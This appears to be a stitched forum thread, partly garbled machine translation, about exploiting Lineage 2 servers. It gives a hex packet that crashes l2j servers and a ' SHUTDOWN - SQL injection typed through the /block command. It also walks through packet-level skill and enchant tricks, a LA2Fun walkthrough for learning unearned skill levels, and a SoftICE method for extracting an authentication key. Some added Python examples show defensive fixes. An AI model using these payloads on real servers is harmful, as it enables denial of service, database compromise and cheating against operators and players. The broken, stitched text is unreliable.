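A server that applies this check answers the "mutant" request with CharCreateFail instead of creating the character, and the second immortality trick described later (a nonexistent race id) is caught by the same table lookup.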
In theory the bug cannot give us anything except fun (a light elf who spoils mobs :)), but it turned out that two more things result from this, at first sight uninteresting, bug. As far as you know, every race has its own NPCs, at which profession quests are taken and skills are learned. And so, mutants learn the class skills of one race at the NPC of another race. For example, playing a light elf, I learned the dwarven skill "Spoil" at an elven NPC. And here the question arose: who will then give me a profession, and which one? The thing is that skills are given depending on the profession (in this context, the "class"), whereas quests depend on the race. That is, it may turn out that on reaching level 20, being a dwarf spoiler, you can receive the profession "Elven Knight" (the first profession of light elves). But this information is not confirmed in practice. By the way, only a small number of mutants can learn skills at all.

And in general, if we speak about skills in la2, there is one more bug. The official LA2 client does not check that the character's level matches the level at which a skill becomes available for study. That is, for example, being a level 5 human fighter you can learn Mortal Blow of the maximum level (provided you have enough SP). It is easily done at the packet level. I would also add that on l2j servers any checks are absent altogether. That is, you can even learn those skills which are accessible only to GMs.

7. Immortality

Here we have reached the most interesting topic, called among the people "god mode". You must agree, on a server with more than 1000 people online, being immortal is a pleasure =) To begin with: when does immortality come? To this question a banal, but as it turned out exact, answer was given: when the character is already dead. It seems like nonsense, but when a character has 0 HP and is alive, it cannot be killed (well, not entirely impossible :) about that below).
But how to make it so that the character has absolute 0 HP, is alive, and at the same time its HP is not restored? First let us consider the problem of 0 HP. In la2 there is such a bug: if after death you press "return to the nearest village" and immediately kill the l2.exe process, the character appears in town with absolute 0 HP and even with buffs (if there were any before). This is because after the RequestRestartPoint packet the client should send an Appearing packet, and it is after that one that the server actually restores the character's HP and clears buffs. And since we close the client, it does not have time to send this packet. By the way, why do I keep saying "absolute" 0? The thing is that on the server HP is stored in a variable of type float (most interestingly, it is sent to the client as an integer). That is, if you gradually reduce HP to 0 by means of bleed or poison you will not get an absolute 0, and if HP is not zero, it means you are alive. Therefore the only way to get an absolute 0 is to die. So, we have learned how to get 0 HP; now let us talk about how to freeze it at zero.

1) The first step in this direction was creating a dwarf mage (as described in the previous paragraph). Most likely, because dwarves have no mage class at all, its HP/MP are not regenerated. Accordingly, having done the above-mentioned actions with such a dwarf, we get an immortal character. This bug has been fixed practically everywhere.
2) The second way was discovered a little after dwarf mages. It turned out that when a nonexistent race is chosen, an immortal human with any class is created. And most interestingly, if you create a human mage this way, you still get a human fighter, but with magic skills.

These two ways have two very serious drawbacks:
a) the created characters cannot learn skills or receive a profession.
b) as you understand, реген HP does not work in general, according to you will have to run immortal all time. 3) and now, attention, a bug - which to me the same has helped to find all hint. How much you know, in a ruler there is such piece as overweight. When you are loaded on 65 % +, at you speed of run, attack and regeneration falls. But very few people knows, that if at you of 90 % + besides you cannot move, at you is not recycled HP! But that to sense of what, having appeared after death in city, you will stand on a place immortal? And here to us will help strider! Sowing on it, you can run with its speed that HP all equally is not recycled! But here there is too a small reef - on some servers (reborn.ru - C4) it is impossible to attack being on strider. Here there's nothing to be done, I can advise to use only buff blazing skin/freazing skin. 4) well and last bug with immortality is demon's set. Perhaps the oldest bug on immortality and about it basically everyone know it. It is fastened that at you turns out negative HP and you accordingly besides cannot be killed. All the above described types of immortality unites one serious lack. The character ceases to be immortal as soon as at it somehow will increase HP - in consequence lvlup's or banal heal's. Also it dies from bleed, poison, some vampirisms. Still here the bug with " fake death " was recollected. On some curves java after FD charms as though and remain dead and they cannot be attacked while they will not make restart. Well it so, to a word. 8. ' remote DoS' also that it gives Usually vulnerability of a similar sort especially are not appreciated, as more than simply "jokes" from them anything to receive it is impossible. LA2 constantly keeps a condition of the world (through each N-seconds - this question still precisely is not studied, yes it and not so is important) that after sudden falling to make recoil. 
That is, being able to predict (or to provoke) falling of a game-server, we receive " authority above recoils ". What does it mean? And what, have killed you? Recoil! You have undressed? Recoil!! At you it has not turned out to grind a belonging? Recoil!!! Besides there are very valuable monsters who have very big resp time (fairy queen timinel - респ 5 hours, for example) and are present at an individual copy. Have killed, have tumbled down a server, the server has risen, моб has again appeared. As a result time респа is reduced from 5 o'clock up to minutes. How to overload a server? For l2j 100 % the working way is crystallization. Код: 72 // RequestCrystallizeItem 00 00 00 00 // OID subject FF FF FF FF // quantity It is substituted in this package real OID a subject and it is sent. On what the server instantly falls. For projects here all is more complex. At enciphering packages wrong key, the server sometimes falls. WHY? If keys do not coincide, the server means at decoding receives absolutely random values (That is that we have ciphered). And to track down just that sequence of values at which the server falls, at me meanwhile it has not turned out. 9. 
integer overflow in a network cursor l2j Well and so that finally to deny opinion that in lineage2 is not present serious bugs, I shall show to you integer overflow in a server l2j in procedure of processing of client packages: Код: public void run() { _log.fine("loginserver thread[C] started"); int lengthHi = 0; int lengthLo = 0; int length = 0; boolean checksumOk = false; int sessionKey = -1; String account = null; String gameServerIp = null; try { InetAddress adr = InetAddress.getByName(_gameServerHost); gameServerIp = adr.getHostAddress(); Init startPacket = new Init(); _out.write(startPacket.getLength() & 0xff); _out.write(startPacket.getLength() >> 8 & 0xff); _out.write(startPacket.getContent()); _out.flush(); do { lengthLo = _in.read(); lengthHi = _in.read(); length = lengthHi * 256 + lengthLo; if(lengthHi < 0) { _log.warning("Client terminated the connection."); break; } byte incoming[] = new byte[length]; incoming[0] = (byte)lengthLo; incoming[1] = (byte)lengthHi; ................. It certainly not absolutely ' integer overflow ' in classical understanding of this word-combination, but leads it all over again to two-byte overflow (off-by-two overflow), and then to... Similar vulnerability is available in La2 the client and l2walker'. They hang, devouring 100 % of processor time. But their source codes at me are not present, but there is a basis to believe, that there a code a little other. By the way speaking, server L2J simply completely is filled by similar bugs. Many of them are described on cheats forums. 10. SQL-injection Yes, through this bug in forums it has been cracked, probably, even more servers than once by means of a unicode-bug in iis. What my surprise when I have learned was, that it is and in lineage. And it basically and clearly, much that we transfer a la2-server (titles for members of a clan, nickname for ignore, the list of friends and other) at once is added in server sql-base. 
Accordingly, a simple command:/block ' SHUTDOWN - we can switch off a sql-server. Most of all amazes that the administrators undertaken fixed this bug, first of all filtered asked on a to speak " SHUTDOWN - " and only have then guessed, that restart of a server is the most minimal that it is possible to make using this bug. In more detail on this bug I shall not , as it, perhaps, most serious that in general is in a ruler. I shall tell only, that fixed it it is the extremely curve:) 11. Enchant to Me, the bug with enchanting costs on the second place on a demand after "dupe". What is the sharpening in general? It is such roll which allows to improve characteristics of this or that belonging then leaves. But to improve it is possible at all indefinitely. After +3 there is a probability of that the belonging will break. And, the above the degree "enchant" things, the is more probability of its breakage (by the way, not the fact, about it below). Just presence here to this variable "probability" has led to occurrence of uncountable set of ways of enchanting. For example, at someone suddenly any miracle had turned out to enchant on +6, when it... Ran! And now this person writes at forums that is new 100 % a way of a point. Also the some people write, that it is better enchant than 1 times at 1-st level, better enchanting the gnome, also that the probability depends on "recommendations", from intelligence (by the way, about INT to me the person has told a man of education), it is better enchant at night, to use soulshots, to beat during this moment mob, to measure time between points and so on and so forth. I, certainly, cannot argue with these statements as I have not tested everything that write at forums, but I know precisely - a way of enchanting many people are ready to pay quite good money for 100 %. Hence, such way on public unfortunately is not present. And whether there is it in general? We Shall try to understand it together. 
For the beginning, let's disassemble, how at a batch level enchant a belonging: 1-st package is when in game we press the right button on enchanting, that is we activate it. Код: 14 // type of a package (UseItem) 86 a4 13 40 // OID enchant 00 00 00 00 After activation of enchant we choose that subject which we want to enchanting: 58 // type of a package (RequestEnchantItem) 74 a4 13 40 // OID a subject All is extremely simple. By the way speaking, alongside with numerous ways of enchanting, there was such theory, that the probability of a point miscalculates on the client and as though we speak a server, the subject has broken or not. And as if simple artmoney 100 % enchant are possible. It not the truth, you just in it were convinced. Really, at a batch level a point looks it is extremely simple. How it is possible to deceive th
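The header handling of the quoted run() loop, modelled in Python as an added example (this is not l2j's code): the first reader mirrors the quoted logic and fails the same way on a two-byte header that declares a length of 0 or 1, the second validates the declared length before allocating or indexing. The MAX_FRAME bound and the body read after the header are assumptions, because the snippet is cut off after the two header writes.

```python
"""Length-prefixed packet framing: a model of the quoted l2j loop beside a
checked reader.  Added example, not l2j project code."""
import io

MAX_FRAME = 0xFFFF  # assumed upper bound for a two-byte little-endian length


class FramingError(ValueError):
    """Raised by the checked reader on any header the server should reject."""


def read_frame_unchecked(stream):
    """Mirror of the quoted Java loop: trust the two header bytes, allocate a
    buffer of that size and copy the header into slots 0 and 1.  A header that
    says 0 or 1 raises IndexError here, just as the Java code throws
    ArrayIndexOutOfBoundsException, and nothing in the loop catches it."""
    lo = stream.read(1)
    hi = stream.read(1)
    if not hi:                      # the Java check "lengthHi < 0": peer closed
        return None
    length = hi[0] * 256 + lo[0]    # little-endian, as in the post
    incoming = bytearray(length)
    incoming[0] = lo[0]             # IndexError when length < 2 (off-by-two)
    incoming[1] = hi[0]
    # The quoted snippet is cut off here; reading the remaining declared bytes
    # into the buffer is an assumption about what follows.
    body = stream.read(length - 2)
    incoming[2:2 + len(body)] = body
    return bytes(incoming)


def read_frame_checked(stream):
    """Validate the length before allocating.  Rejects headers smaller than the
    header itself or larger than MAX_FRAME, and treats a short body as a
    protocol error instead of handing back a partially filled frame."""
    header = stream.read(2)
    if len(header) < 2:
        return None
    length = int.from_bytes(header, "little")
    if length < 2 or length > MAX_FRAME:
        raise FramingError(f"rejected frame length {length}")
    body = stream.read(length - 2)
    if len(body) != length - 2:
        raise FramingError("short read: peer sent fewer bytes than declared")
    return header + body


def parse(raw):
    """Checked reader over one constructed byte string."""
    return read_frame_checked(io.BytesIO(raw))


def probe(raw):
    """Run both readers over one constructed byte string and report how each
    ends: 'ok', 'eof', or the name of the exception it raised."""
    results = []
    for reader in (read_frame_unchecked, read_frame_checked):
        try:
            frame = reader(io.BytesIO(raw))
            results.append("eof" if frame is None else "ok")
        except (IndexError, FramingError) as exc:
            results.append(type(exc).__name__)
    return tuple(results)


if __name__ == "__main__":
    # Constructed inputs: a valid 5-byte frame, two short headers, and EOF.
    for raw in (b"\x05\x00abc", b"\x00\x00", b"\x01\x00", b""):
        print(raw, probe(raw))
```

The unchecked reader dies with an uncaught exception on a two-byte header, which is the failure the post describes; the checked reader turns the same input into a FramingError the connection handler can log and close on, and it also refuses to allocate for a declared length it has not yet received.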
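The ignore-list write described in the SQL injection section, as an added example (not l2j code): the statement built by string formatting, the pattern the post describes, beside a parameterized insert with a name allowlist in front of it. The table is an in-memory sqlite3 database constructed here; the payload string is the one quoted in the post.

```python
"""An ignore-list write done two ways: string-built SQL beside a parameterized
statement.  Added example, not l2j code; the table is constructed in memory."""
import re
import sqlite3

# Constructed allowlist for character names: letters, digits and underscore.
NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,16}$")


def build_block_unsafe(char_id, target_name):
    """Return the SQL text the vulnerable pattern would send.  It is never
    executed here; the returned string only shows how a quote inside
    target_name ends the literal and lets the rest of the name run as SQL."""
    return ("INSERT INTO ignore_list (char_id, target) VALUES (%d, '%s')"
            % (char_id, target_name))


def open_db():
    """Constructed in-memory table standing in for the server's SQL base."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ignore_list (char_id INTEGER, target TEXT)")
    return conn


def block_user(conn, char_id, target_name):
    """Allowlist check, then a parameterized insert.  Returns
    ('rejected', reason) or ('stored', names_ignored_by_char)."""
    if not NAME_RE.match(target_name):
        return "rejected", "name contains characters outside the allowlist"
    conn.execute("INSERT INTO ignore_list (char_id, target) VALUES (?, ?)",
                 (char_id, target_name))
    rows = conn.execute("SELECT target FROM ignore_list WHERE char_id = ?",
                        (char_id,)).fetchall()
    return "stored", [r[0] for r in rows]


def store_raw(conn, char_id, target_name):
    """Parameterized insert without the allowlist, to show that even an
    unfiltered name is stored as data: the driver never parses it as SQL."""
    conn.execute("INSERT INTO ignore_list (char_id, target) VALUES (?, ?)",
                 (char_id, target_name))
    return conn.execute("SELECT target FROM ignore_list WHERE char_id = ?",
                        (char_id,)).fetchone()[0]


if __name__ == "__main__":
    payload = "' SHUTDOWN -"          # the payload quoted in the post
    print(build_block_unsafe(7, payload))
    db = open_db()
    print(block_user(db, 7, payload))
    print(block_user(db, 7, "Tof_A"))
    print(repr(store_raw(db, 8, payload)))
```

The allowlist is defense in depth, not the fix: the parameterized statement alone is what keeps the name out of the SQL grammar, which is why store_raw returns the payload unchanged as a stored string.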
  5. Cause they would be patched in five seconds after their release. That's why no one shares them, they don't want to make the same mistake twice. I know... it's sad... but that's life. People here share exploits long after they were patched.
  6. I wanted to ask if there is a new way to find the Char ID, the old one with socks cap and l2 logger doesn't work anymore as the C4 version of L2.exe can not be started via socks cap. So is it possible to bypass this error or is there another way to see the char ID?
  7. JUST LINK IT YOURSELF WITH THE CORRECT IMAGES So, I shall show on one very well-known Russian LA2 C3 server the possibility of learning inaccessible skill levels with the program LA2Fun. To begin with, here is a screen of the initial character (Treasure Hunter, level 56): As you can see, the skill deadly blow (the basic skill of dagger users) is leveled up to level 18, which corresponds to a level 56 TH. We shall try to learn level 35, which is inaccessible to us (it can only be learned at level 74). To begin with, we bring the char to the NPC in Giran through whom he can learn skills (let's take Master Dufner). Then we leave the game and open the file skill.lst, which comes with the program LA2Fun, and search in it for the skill "deadly blow": We remember its number: 263. Now we open the program and fill in the necessary fields: Set the switch "What shall we do?" to the position "Learn skills". In the NPC list choose the one from whom you are going to learn skills (Dufner (human fighter)). Skill level - 35 (maximum 37). Char number - the serial number of the character counting from the left (as seen in the LA2 client), counting from zero. That is, for example, if the char is the first in the list, the number will be 0; if the second, 1, and so on. Login/password - the login and password of your account, respectively. IP address and token - to fill in these fields, choose your server in the list below (to the right of the buttons). Then press start. If everything went normally and you see approximately what is shown on the screen, try to enter the game with a bot or the client to check the result: Everything worked out for us: at one stroke we pumped the skill deadly blow from level 18 to level 35. We can do the same with all other skills (even passive ones like light armor mastery, dagger mastery), on any other char, even of lower levels. Lastly, one more screenshot of a level 45 prophet. Pay attention to the level of the skill bless the body:
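The check that the post says the server is missing, written as an added example (not l2j, official LA2 or LA2Fun code): a server-side validation of a learn-skill request that looks only at the server's own record of the character. The skill tree, SP costs and character data are constructed for illustration; the two deadly blow entries follow the levels given in the post, the rest are made up.

```python
"""Server-side validation of a learn-skill request.  Added example; the skill
tree, SP costs and character data below are constructed for illustration and
are not l2j, official LA2 or LA2Fun data."""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class SkillStep:
    skill_id: int
    level: int
    min_char_level: int   # character level at which this step becomes learnable
    sp_cost: int
    gm_only: bool = False


# Constructed skill tree: class name -> {(skill_id, level): requirements}.
# Skill 263 "deadly blow" at level 18 for a level-56 Treasure Hunter and at
# level 35 for level 74 follow the post; the other entries are invented.
SKILL_TREE = {
    "treasure_hunter": {
        (263, 18): SkillStep(263, 18, 56, 40_000),
        (263, 19): SkillStep(263, 19, 58, 52_000),
        (263, 20): SkillStep(263, 20, 60, 66_000),
        (263, 35): SkillStep(263, 35, 74, 300_000),
        (9000, 1): SkillStep(9000, 1, 1, 0, gm_only=True),  # placeholder GM skill
    },
}


@dataclass
class Character:
    class_name: str
    level: int
    sp: int
    is_gm: bool = False
    skills: dict = field(default_factory=dict)   # skill_id -> learned level


def check_learn(char, skill_id, level):
    """Decide whether `char` may learn `skill_id` at `level`.  Returns
    (allowed, reason).  Every rule is evaluated on the server's own view of the
    character; nothing the client sends beyond the (skill, level) pair is
    trusted."""
    tree = SKILL_TREE.get(char.class_name)
    if tree is None:
        return False, "unknown class"
    step = tree.get((skill_id, level))
    if step is None:
        return False, "skill level not in this class's tree"
    if step.gm_only and not char.is_gm:
        return False, "GM-only skill"
    current = char.skills.get(skill_id, 0)
    if level != current + 1:            # no jumping from 18 straight to 35
        return False, f"next learnable level is {current + 1}"
    if char.level < step.min_char_level:
        return False, f"requires character level {step.min_char_level}"
    if char.sp < step.sp_cost:
        return False, f"needs {step.sp_cost} SP"
    return True, "ok"


def learn(char, skill_id, level):
    """Apply the request only after check_learn passes; returns its verdict."""
    allowed, reason = check_learn(char, skill_id, level)
    if allowed:
        char.sp -= SKILL_TREE[char.class_name][(skill_id, level)].sp_cost
        char.skills[skill_id] = level
    return allowed, reason


if __name__ == "__main__":
    # Constructed character matching the post's starting point.
    th = Character("treasure_hunter", 56, 100_000, skills={263: 18})
    print(learn(th, 263, 35))   # rejected: must take level 19 first
    print(learn(th, 263, 19))   # rejected: character level too low
```

Rejecting a skipped level and a too-low character level separately matters for detection: a request for level 35 from a character holding level 18 is not a client bug, and a handler that logs the reason gives the admin something to alert on.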
  8. Has anybody tried this? Method to find the KEY, could be used to find AUTHD too: required software: SOFTICE, SPY_CAPTURE. Theory: because keying in the wrong key would return to the message window, thus using WM_GETTEXT and WM_COMMAND to debug it, we could analyze the asm and hex code to derive the key. Use: 1. Open L2AuthD_60215, use SPY_CAPTURE to find the main window, click on the OK BUTTON as well as the TEXTLABEL line break subsequently as: handle:001401DC; handle:003E03A4; handle:0023045A. 2. Open SOFTICE, include L2AuthD_60215's entry point. 3. Key in the debug command: a. debug button: BMSG 003E03A4 WM_COMMAND b. debug text: BMSG 0023045A WM_GETTEXT c. debug sequence code: BMSG 001401DC WM_GETTEXT 4. Press F5 to run the sequence. 5. Record the hex after "[]" (16 bytes). 6. Take this hex and convert it into (base10 I think). 7. KEY in this key. SUCCESS~~~~~ Hope everybody could find the real key after some tries... Cached : audhaudhuahdasdhuadhuahduashd
  9. Very nice, what can we do with those .exe's, can we run it without them?
  10. I don't get it, what is better about not seeing your own HP?
  11. So...how to connect? And what do we need? I mean do we have to pay something or is it free?
  12. It doesn't work with B or higher grade, that's all. Good bye!